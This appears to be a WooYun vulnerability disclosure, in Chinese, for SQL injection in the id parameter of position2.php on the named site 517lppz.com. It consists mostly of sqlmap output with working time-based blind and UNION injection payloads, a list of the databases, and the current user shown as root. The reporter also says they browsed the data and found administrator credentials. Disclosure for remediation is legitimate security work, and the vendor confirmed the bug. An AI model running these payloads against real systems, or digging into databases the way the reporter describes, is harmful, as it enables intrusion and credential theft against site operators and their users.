乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
天地本不仁 万物为刍狗 【HD】 以团队之名 以个人之荣耀 共建网络安全
注入点:http://www.517lppz.com/position2.php?id=-1参数 id 可注入
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 103 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ZJFR)-- XMBf21=6 AND 000649=000649 -- Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x4f7842586e75516d774d,0x71626b7071),NULL,NULL,NULL,NULL,NULL,NULL-- 21=6 AND 000649=000649 -----[15:34:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0.12[15:34:32] [INFO] fetching database namesavailable databases [4]:[*] bestore[*] information_schema[*] mysql[*] test[15:34:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.517lppz.com'[*] shutting down at 15:34:32
看了下权限
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))ZJFR)-- XMBf21=6 AND 000649=000649 -- Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: http://www.517lppz.com:80/position2.php?id=-1 OR 3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x4f7842586e75516d774d,0x71626b7071),NULL,NULL,NULL,NULL,NULL,NULL-- 21=6 AND 000649=000649 -----[15:46:26] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0.12[15:46:26] [INFO] fetching current usercurrent user: 'root@localhost'[15:46:27] [INFO] fetching current databasecurrent database: 'bestore'[15:46:27] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.517lppz.com'[*] shutting down at 15:46:27
顺便看了下 数据(找到了管理员的账号和密码 可惜没找到登陆地址)
危害等级:高
漏洞Rank:10
确认时间:2015-07-13 17:58
漏洞属实,,感谢关注!!
暂无